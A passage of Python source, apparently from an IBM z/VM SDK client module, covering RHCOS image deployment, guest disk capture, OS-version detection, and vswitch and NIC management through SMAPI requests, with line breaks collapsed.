guest_deploy_rhcos(self, userid, image_name, transportfiles, remotehost=None, vdev=None, hostname=None): """ Deploy image and punch config driver to target """ # (TODO: add the support of multiple disks deploy) msg = ('Start to deploy image %(img)s to guest %(vm)s' % {'img': image_name, 'vm': userid}) LOG.info(msg) image_file = '/'.join([self._get_image_path_by_name(image_name), CONF.zvm.user_root_vdev]) # Unpack image file to root disk vdev = vdev or CONF.zvm.user_root_vdev tmp_trans_dir = None if remotehost: # download igintion file from remote host tmp_trans_dir = tempfile.mkdtemp() local_trans = '/'.join([tmp_trans_dir, os.path.basename(transportfiles)]) cmd = ["/usr/bin/scp", "-B", "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", ("%s:%s" % (remotehost, transportfiles)), local_trans] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ('copy ignition file with command %(cmd)s ' 'failed with output: %(res)s' % {'cmd': str(cmd), 'res': output}) LOG.error(err_msg) raise exception.SDKGuestOperationError(rs=4, userid=userid, err_info=err_msg) transportfiles = local_trans cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name, transportfiles, vdev, image_file, hostname) with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("unpackdiskimage failed with return code: %d." % rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) raise exception.SDKGuestOperationError(rs=3, userid=userid, unpack_rc=rc, err=err_output) # remove the temp ignition file if tmp_trans_dir: self._pathutils.clean_temp_folder(tmp_trans_dir) # Update os version in guest metadata # TODO: may should append to old metadata, not replace metadata = 'os_version=%s' % self.image_get_os_distro(image_name) self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata) msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s' ' successfully' % {'img': image_name, 'vm': userid, 'vdev': vdev}) LOG.info(msg) def guest_capture(self, userid, image_name, capture_type='rootonly', compress_level=6): if capture_type == "alldisks": func = ('Capture guest with type: %s' % capture_type) msg = ('%s is not supported in current release' % func) LOG.error(msg) raise exception.SDKFunctionNotImplementError(func=func, modID='guest') msg = ('Start to capture %(vm)s to generate image %(img)s with ' 'capture type %(type)s' % {'vm': userid, 'img': image_name, 'type': capture_type}) LOG.info(msg) self._check_power_state(userid, 'capture') # Make sure the iucv channel is ready for communication on source vm try: self.execute_cmd(userid, 'pwd') except exception.SDKSMTRequestFailed as err: msg = ('Failed to check iucv status on capture source vm ' '%(vm)s with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) # Get the os version of the vm try: os_version = self._guest_get_os_version(userid) except exception.SDKSMTRequestFailed as err: msg = ('Failed to execute command on capture source vm %(vm)s' 'to get os version with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except Exception as err: msg = ('Error happened when parsing os version on source vm ' '%(vm)s with error: %(err)s' % {'vm': userid, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) msg = ('The os version of capture source vm %(vm)s is %(version)s' % {'vm': userid, 'version': os_version}) LOG.info(msg) # Find the root device according to the capture type try: capture_devices = self._get_capture_devices(userid, capture_type) except exception.SDKSMTRequestFailed as err: msg = ('Failed to execute command on source vm %(vm)s to get the ' 'devices for capture with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except Exception as err: msg = ('Internal error happened when getting the devices for ' 'capture on source vm %(vm)s with error %(err)s' % {'vm': userid, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except exception.SDKGuestOperationError: raise # Shutdown the vm before capture self.guest_softstop(userid) # Prepare directory for writing image file image_temp_dir = '/'.join((CONF.image.sdk_image_repository, const.IMAGE_TYPE['CAPTURE'], os_version, image_name)) self._pathutils.mkdir_if_not_exist(image_temp_dir) # Call creatediskimage to capture a vm to generate an image # TODO:(nafei) to support multiple disk capture vdev = capture_devices[0] msg = ('Found the device %(vdev)s of %(vm)s for capture' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) image_file_name = vdev image_file_path = '/'.join((image_temp_dir, image_file_name)) cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev, image_file_path, '--compression', str(compress_level)] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("creatediskimage failed with return code: %d." % rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) self._pathutils.clean_temp_folder(image_temp_dir) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=err_output) # Move the generated image to netboot folder image_final_dir = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], os_version, image_name]) image_final_path = '/'.join((image_final_dir, image_file_name)) self._pathutils.mkdir_if_not_exist(image_final_dir) cmd = ['mv', image_file_path, image_final_path] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("move image file from staging to netboot " "folder failed with return code: %d." % rc) LOG.error(err_msg) self._pathutils.clean_temp_folder(image_temp_dir) self._pathutils.clean_temp_folder(image_final_dir) raise exception.SDKGuestOperationError(rs=5, userid=userid, err=err_msg) self._pathutils.clean_temp_folder(image_temp_dir) msg = ('Updating the metadata for captured image %s ' % image_name) LOG.info(msg) # Get md5sum of image real_md5sum = self._get_md5sum(image_final_path) # Get disk_size_units of image disk_size_units = self._get_disk_size_units(image_final_path) # Get the image physical size image_size = self._get_image_size(image_final_path) # Create the image record in image database self._ImageDbOperator.image_add_record(image_name, os_version, real_md5sum, disk_size_units, image_size, capture_type) LOG.info('Image %s is captured and imported to image repository ' 'successfully' % image_name) def _guest_get_os_version(self, userid): os_version = '' release_file = self.execute_cmd(userid, 'ls /etc/*-release') if '/etc/os-release' in release_file: # Parse os-release file, part of the output looks like: # NAME="Red Hat Enterprise Linux Server" # ID="rhel" # VERSION_ID="7.0" release_info = self.execute_cmd(userid, 'cat /etc/os-release') release_dict = {} for item in release_info: if item: release_dict[item.split('=')[0]] = item.split('=')[1] distro = release_dict['ID'] version = release_dict['VERSION_ID'] if '"' in distro: distro = eval(distro) if '"' in version: version = eval(version) os_version = '%s%s' % (distro, version) return os_version elif '/etc/redhat-release' in release_file: # The output looks like: # "Red Hat Enterprise Linux Server release 6.7 (Santiago)" distro = 'rhel' release_info = self.execute_cmd(userid, 'cat /etc/redhat-release') distro_version = release_info[0].split()[6] os_version = ''.join((distro, distro_version)) return os_version elif '/etc/SuSE-release' in release_file: # The output for this file looks like: # SUSE Linux Enterprise Server 11 (s390x) # VERSION = 11 # PATCHLEVEL = 3 distro = 'sles' release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release') LOG.debug('OS release info is %s' % release_info) release_version = '.'.join((release_info[1].split('=')[1].strip(), release_info[2].split('=')[1].strip())) os_version = ''.join((distro, release_version)) return os_version elif '/etc/system-release' in release_file: # For some rhel6.7 system, it only have system-release file and # the output looks like: # "Red Hat Enterprise Linux Server release 6.7 (Santiago)" distro = 'rhel' release_info = self.execute_cmd(userid, 'cat /etc/system-release') distro_version = release_info[0].split()[6] os_version = ''.join((distro, distro_version)) return os_version def _get_capture_devices(self, userid, capture_type='rootonly'): capture_devices = [] if capture_type == 'rootonly': # Parse the /proc/cmdline to get root devices proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline ' '| tr " " "\\n" | grep -a "^root=" | cut -c6-') root_device_info = proc_cmdline[0] if not root_device_info: msg = ('Unable to get useful info from /proc/cmdline to ' 'locate the device associated with the root directory ' 'on capture source vm %s' % userid) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) else: if 'UUID=' in root_device_info: uuid = root_device_info.split()[0].split('=')[1] root_device = '/'.join(('/dev/disk/by-uuid', uuid)) elif 'LABEL=' in root_device_info: label = root_device_info.split()[0].split('=')[1] root_device = '/'.join(('/dev/disk/by-label', label)) elif 'mapper' in root_device_info: msg = ('Capturing a disk with root filesystem on logical' ' volume is not supported') raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) else: root_device = root_device_info root_device_node = self.execute_cmd(userid, 'readlink -f %s' % root_device)[0] # Get device node vdev by node name cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' % root_device_node.split('/')[-1].rstrip(string.digits)) result = self.execute_cmd(userid, cmd)[0] root_device_vdev = result.split()[0][4:8] capture_devices.append(root_device_vdev) return capture_devices else: # For sysclone, parse the user directory entry to get the devices # for capture, leave for future pass def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name, transportfiles=None, vdev=None, image_file=None, hostname=None): os_version = self.image_get_os_distro(image_name) # Query image disk type image_disk_type = self._get_image_disk_type(image_name) if image_disk_type is None: err_msg = ("failed to get image disk type for " "image '%(image_name)s'." % {'image_name': image_name}) raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) try: # Query vm's disk pool type and image disk type from zvmsdk import dist _dist_manager = dist.LinuxDistManager() linuxdist = _dist_manager.get_linux_dist(os_version)() # Read coros fixed ip parameter from tempfile fixed_ip_parameter = linuxdist.read_coreos_parameter(userid) except Exception as err: err_msg = ("failed to read coreos fixed ip" "parameters for userid '%(userid)s'," "error: %(err)s." % {'userid': userid, 'err': err}) raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) if fixed_ip_parameter is None: err_msg = ("coreos fixed ip parameters don't exist.") raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) if hostname is not None: # replace hostname to display name instead of userid fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(), hostname) # read nic device id and change it into the form like # "0.0.1000,0.0.1001,0.0.1002" nic_id = self._generate_increasing_nic_id( fixed_ip_parameter.split(":")[5].replace("enc", "")) return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev, image_file, transportfiles, image_disk_type, nic_id, fixed_ip_parameter] def grant_user_to_vswitch(self, vswitch_name, userid): """Set vswitch to grant user.""" smt_userid = zvmutils.get_smt_userid() requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid, "--operands", "-k switch_name=%s" % vswitch_name, "-k grant_userid=%s" % userid, "-k persist=YES")) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to grant user %s to vswitch %s, error: %s" % (userid, vswitch_name, err.format_message())) self._set_vswitch_exception(err, vswitch_name) def _set_vswitch_exception(self, error, switch_name): if ((error.results['rc'] == 212) and (error.results['rs'] == 40)): obj_desc = "Vswitch %s" % switch_name raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)): errmsg = ("Operation is not allowed for a " "VLAN UNAWARE vswitch") raise exception.SDKConflictError(modID='network', rs=5, vsw=switch_name, msg=errmsg) elif ((error.results['rc'] == 396) and ((error.results['rs'] == 2838) or (error.results['rs'] == 2853) or (error.results['rs'] == 2856) or (error.results['rs'] == 2858) or (error.results['rs'] == 3022) or (error.results['rs'] == 3033))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=5, vsw=switch_name, msg=errmsg) else: raise error def revoke_user_from_vswitch(self, vswitch_name, userid): """Revoke user for vswitch.""" smt_userid = zvmutils.get_smt_userid() requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid, "--operands", "-k switch_name=%s" % vswitch_name, "-k revoke_userid=%s" % userid, "-k persist=YES")) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to revoke user %s from vswitch %s, error: %s" % (userid, vswitch_name, err.format_message())) self._set_vswitch_exception(err, vswitch_name) def image_performance_query(self, uid_list): """Call Image_Performance_Query to get guest current status. :uid_list: A list of zvm userids to be queried """ if uid_list == []: return {} if not isinstance(uid_list, list): uid_list = [uid_list] smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Image_Performance_Query" % smt_userid, "--operands", '-T "%s"' % (' '.join(uid_list)), "-c %d" % len(uid_list))) action = "get performance info of userid '%s'" % str(uid_list) with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) ipq_kws = { 'userid': "Guest name:", 'guest_cpus': "Guest CPUs:", 'used_cpu_time': "Used CPU time:", 'elapsed_cpu_time': "Elapsed time:", 'min_cpu_count': "Minimum CPU count:", 'max_cpu_limit': "Max CPU limit:", 'samples_cpu_in_use': "Samples CPU in use:", 'samples_cpu_delay': "Samples CPU delay:", 'used_memory': "Used memory:", 'max_memory': "Max memory:", 'min_memory': "Minimum memory:", 'shared_memory': "Shared memory:", } pi_dict = {} pi = {} rpi_list = ('\n'.join(results['response'])).split("\n\n") for rpi in rpi_list: try: pi = zvmutils.translate_response_to_dict(rpi, ipq_kws) except exception.SDKInternalError as err: emsg = err.format_message() # when there is only one userid queried and this userid is # in 'off'state, the smcli will only returns the queried # userid number, no valid performance info returned. if(emsg.__contains__("No value matched with keywords.")): continue else: raise err for k, v in pi.items(): pi[k] = v.strip('" ') if pi.get('userid') is not None: pi_dict[pi['userid']] = pi return pi_dict def system_image_performance_query(self, namelist): """Call System_Image_Performance_Query to get guest current status. :namelist: A namelist that defined in smapi namelist file. """ smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API System_Image_Performance_Query" % smt_userid, "--operands -T %s" % namelist)) action = "get performance info of namelist '%s'" % namelist with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) ipq_kws = { 'userid': "Guest name:", 'guest_cpus': "Guest CPUs:", 'used_cpu_time': "Used CPU time:", 'elapsed_cpu_time': "Elapsed time:", 'min_cpu_count': "Minimum CPU count:", 'max_cpu_limit': "Max CPU limit:", 'samples_cpu_in_use': "Samples CPU in use:", 'samples_cpu_delay': "Samples CPU delay:", 'used_memory': "Used memory:", 'max_memory': "Max memory:", 'min_memory': "Minimum memory:", 'shared_memory': "Shared memory:", } pi_dict = {} pi = {} rpi_list = ('\n'.join(results['response'])).split("\n\n") for rpi in rpi_list: try: pi = zvmutils.translate_response_to_dict(rpi, ipq_kws) except exception.SDKInternalError as err: emsg = err.format_message() # when there is only one userid queried and this userid is # in 'off'state, the smcli will only returns the queried # userid number, no valid performance info returned. if(emsg.__contains__("No value matched with keywords.")): continue else: raise err for k, v in pi.items(): pi[k] = v.strip('" ') if pi.get('userid') is not None: pi_dict[pi['userid']] = pi return pi_dict def virtual_network_vswitch_query_byte_stats(self): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" % smt_userid, "--operands", '-T "%s"' % smt_userid, '-k "switch_name=*"' )) action = "query vswitch usage info" with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) return self._parse_vswitch_inspect_data(results['response']) def get_host_info(self): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getHost general") host_info = zvmutils.translate_response_to_dict( '\n'.join(results['response']), const.RINV_HOST_KEYWORDS) return host_info def get_diskpool_info(self, pool): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getHost diskpoolspace %s" % pool) dp_info = zvmutils.translate_response_to_dict( '\n'.join(results['response']), const.DISKPOOL_KEYWORDS) return dp_info def get_vswitch_list(self): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid, "--operands", "-s \'*\'")) try: result = self._request(rd) except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 212) and (err.results['rs'] == 40)): LOG.warning("No Virtual switch in the host") return [] else: LOG.error("Failed to get vswitch list, error: %s" % err.format_message()) raise with zvmutils.expect_invalid_resp_data(): if (not result['response'] or not result['response'][0]): return [] else: data = '\n'.join([s for s in result['response'] if isinstance(s, six.string_types)]) output = re.findall('VSWITCH: Name: (.*)', data) return output def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id): smt_userid = zvmutils.get_smt_userid() msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s ' 'for guest %(vm)s' % {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid}) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Set_Extended" % smt_userid, "--operands", "-k grant_userid=%s" % userid, "-k switch_name=%s" % vswitch_name, "-k user_vlan_id=%s" % vlan_id, "-k persist=YES")) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, " "error: %s" % (vlan_id, vswitch_name, userid, err.format_message())) self._set_vswitch_exception(err, vswitch_name) msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s ' 'for guest %(vm)s successfully' % {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid}) LOG.info(msg) def add_vswitch(self, name, rdev=None, controller='*', connection='CONNECT', network_type='ETHERNET', router="NONROUTER", vid='UNAWARE', port_type='ACCESS', gvrp='GVRP', queue_mem=8, native_vid=1, persist=True): smt_userid = zvmutils.get_smt_userid() msg = ('Start to create vswitch %s' % name) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Create_Extended" % smt_userid, "--operands", '-k switch_name=%s' % name)) if rdev is not None: rd += " -k real_device_address" +\ "=\'%s\'" % rdev.replace(',', ' ') if controller != '*': rd += " -k controller_name=%s" % controller rd = ' '.join((rd, "-k connection_value=%s" % connection, "-k queue_memory_limit=%s" % queue_mem, "-k transport_type=%s" % network_type, "-k vlan_id=%s" % vid, "-k persist=%s" % (persist and 'YES' or 'NO'))) # Only if vswitch is vlan awared, port_type, gvrp and native_vid are # allowed to specified if isinstance(vid, int) or vid.upper() != 'UNAWARE': rd = ' '.join((rd, "-k port_type=%s" % port_type, "-k gvrp_value=%s" % gvrp, "-k native_vlanid=%s" % native_vid)) if router is not None: rd += " -k routing_value=%s" % router msg = ('Start to create vswitch %s' % name) LOG.info(msg) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to create vswitch %s, error: %s" % (name, err.format_message())) raise msg = ('Create vswitch %s successfully' % name) LOG.info(msg) def set_vswitch(self, switch_name, **kwargs): """Set vswitch""" smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Set_Extended" % smt_userid, "--operands", "-k switch_name=%s" % switch_name)) for k, v in kwargs.items(): rd = ' '.join((rd, "-k %(key)s=\'%(value)s\'" % {'key': k, 'value': v})) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to set vswitch %s, error: %s" % (switch_name, err.format_message())) self._set_vswitch_exception(err, switch_name) def delete_vswitch(self, switch_name, persist=True): smt_userid = zvmutils.get_smt_userid() msg = ('Start to delete vswitch %s' % switch_name) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" % smt_userid, "--operands", "-k switch_name=%s" % switch_name, "-k persist=%s" % (persist and 'YES' or 'NO'))) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results if ((results['rc'] == 212) and (results['rs'] == 40)): LOG.warning("Vswitch %s does not exist", switch_name) return else: LOG.error("Failed to delete vswitch %s, error: %s" % (switch_name, err.format_message())) raise msg = ('Delete vswitch %s successfully' % switch_name) LOG.info(msg) def create_nic(self, userid, vdev=None, nic_id=None, mac_addr=None, active=False): nic_vdev = self._get_available_vdev(userid, vdev=vdev) LOG.debug('Nic attributes: vdev is %(vdev)s, ' 'ID is %(id)s, address is %(address)s', {'vdev': nic_vdev, 'id': nic_id or 'not specified', 'address': mac_addr or 'not specified'}) self._create_nic(userid, nic_vdev, nic_id=nic_id, mac_addr=mac_addr, active=active) return nic_vdev def _create_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=7, vdev=vdev, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=7, vdev=vdev, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _create_nic_active_exception(self, error, userid, vdev): if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or ((error.results['rc'] == 204) and (error.results['rs'] == 28))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) elif ((error.results['rc'] == 396) and (error.results['rs'] == 2797)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _is_active(self, userid): # Get the vm status power_state = self.get_power_state(userid) if power_state == 'off': LOG.error('The vm %s is powered off, ' 'active operation is not allowed' % userid) raise exception.SDKConflictError(modID='network', rs=1, userid=userid) def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None, active=False): if active: self._is_active(userid) msg = ('Start to create nic device %(vdev)s for guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' % userid, "--operands", "-k image_device_number=%s" % vdev, "-k adapter_type=QDIO")) if mac_addr is not None: mac = ''.join(mac_addr.split(':'))[6:] requestData += ' -k mac_id=%s' % mac try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to create nic %s for user %s in " "the guest's user direct, error: %s" % (vdev, userid, err.format_message())) self._create_nic_inactive_exception(err, userid, vdev) if active: if mac_addr is not None: LOG.warning("Ignore the mac address %s when " "adding nic on an active system" % mac_addr) requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Create_Extended' % userid, "--operands", "-k image_device_number=%s" % vdev, "-k adapter_type=QDIO")) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err1: msg1 = err1.format_message() persist_OK = True requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid, "--operands", '-v %s' % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: results = err2.results msg2 = err2.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): persist_OK = True else: persist_OK = False if persist_OK: self._create_nic_active_exception(err1, userid, vdev) else: raise exception.SDKNetworkOperationError(rs=4, nic=vdev, userid=userid, create_err=msg1, revoke_err=msg2) self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id) msg = ('Create nic device %(vdev)s for guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def get_user_direct(self, userid): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getvm %s directory" % userid) return results.get('response', []) def _delete_nic_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=8, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _delete_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=9, vdev=vdev, userid=userid, obj=obj_desc) else: raise error def delete_nic(self, userid, vdev, active=False): if active: self._is_active(userid) vdev_exist = False nic_list = self._NetDbOperator.switch_select_record_for_userid(userid) for p in nic_list: if (int(p['interface'], 16) == int(vdev, 16)): vdev_exist = True vdev_info = p break if not vdev_exist: # Device has already be removed from user direct LOG.warning("Virtual device %s does not exist in the switch table", vdev) if active: try: resp = self.execute_cmd(userid, 'vmcp q %s' % vdev) nic_info = "%s ON NIC" % vdev.zfill(4).upper() osa_info = "%s ON OSA" % vdev.zfill(4).upper() if nic_info in resp[0]: pass elif osa_info in resp[0]: self._undedicate_nic(userid, vdev, active=active, del_active_only=True) return else: LOG.warning("Device %s of guest %s is not " "network adapter" % (vdev, userid)) return except exception.SDKSMTRequestFailed as err: emsg = err.format_message() ignored_msg = ('Device %s does not exist' % vdev.zfill(4).upper()) if (emsg.__contains__(ignored_msg)): LOG.warning("Virtual device %s does not exist for " "active guest %s" % (vdev, userid)) return else: raise else: return else: # Device hasnot be removed from user direct, # check whether it is related to a dedicated OSA device if ((vdev_info["comments"] is not None) and (vdev_info["comments"].__contains__('OSA='))): self._undedicate_nic(userid, vdev, active=active) return msg = ('Start to delete nic device %(vdev)s for guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) if vdev_exist: rd = ' '.join(( "SMAPI %s API Virtual_Network_Adapter_Delete_DM" % userid, "--operands", '-v %s' % vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist in " "the guest's user direct", vdev) else: LOG.error("Failed to delete nic %s for %s in " "the guest's user direct, error: %s" % (vdev, userid, emsg)) self._delete_nic_inactive_exception(err, userid, vdev) self._NetDbOperator.switch_delete_record_for_nic(userid, vdev) if active: rd = ' '.join(( "SMAPI %s API Virtual_Network_Adapter_Delete" % userid, "--operands", '-v %s' % vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 204) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist on " "the active guest system", vdev) else: LOG.error("Failed to delete nic %s for %s on " "the active guest system, error: %s" % (vdev, userid, emsg)) self._delete_nic_active_exception(err, userid, vdev) msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def _couple_active_exception(self, error, userid, vdev, vswitch): if ((error.results['rc'] == 212) and ((error.results['rs'] == 28) or (error.results['rs'] == 8))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)): obj_desc = "Vswitch %s" % vswitch raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 396) and ((error.results['rs'] == 2788) or (error.results['rs'] == 2848) or (error.results['rs'] == 3034) or (error.results['rs'] == 6011))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) else: raise error def _couple_inactive_exception(self, error, userid, vdev, vswitch): if ((error.results['rc'] == 412) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=11, vdev=vdev, userid=userid, vsw=vswitch, obj=obj_desc) elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)): obj_desc = "Guest %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=11, vdev=vdev, userid=userid, vsw=vswitch, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') else: raise error def _couple_nic(self, userid, vdev, vswitch_name, active=False): """Couple NIC to vswitch by adding vswitch into user direct.""" if active: self._is_active(userid) msg = ('Start to couple nic device %(vdev)s of guest %(vm)s ' 'with vswitch %(vsw)s' % {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s' % userid, "API Virtual_Network_Adapter_Connect_Vswitch_DM", "--operands", "-v %s" % vdev, "-n %s" % vswitch_name)) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to couple nic %s to vswitch %s for user %s " "in the guest's user direct, error: %s" % (vdev, vswitch_name, userid, err.format_message())) self._couple_inactive_exception(err, userid, vdev, vswitch_name) # the inst must be active, or this call will failed if active: requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Connect_Vswitch', "--operands", "-v %s" % vdev, "-n %s" % vswitch_name)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err1: results1 = err1.results msg1 = err1.format_message() if ((results1 is not None) and (results1['rc'] == 204) and (results1['rs'] == 20)): LOG.warning("Virtual device %s already connected " "on the active guest system", vdev) else: persist_OK = True requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Disconnect_DM', "--operands", '-v %s' % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: results2 = err2.results msg2 = err2.format_message() if ((results2 is not None) and (results2['rc'] == 212) and (results2['rs'] == 32)): persist_OK = True else: persist_OK = False if persist_OK: self._couple_active_exception(err1, userid, vdev, vswitch_name) else: raise exception.SDKNetworkOperationError(rs=3, nic=vdev, vswitch=vswitch_name, couple_err=msg1, revoke_err=msg2) """Update information in switch table.""" 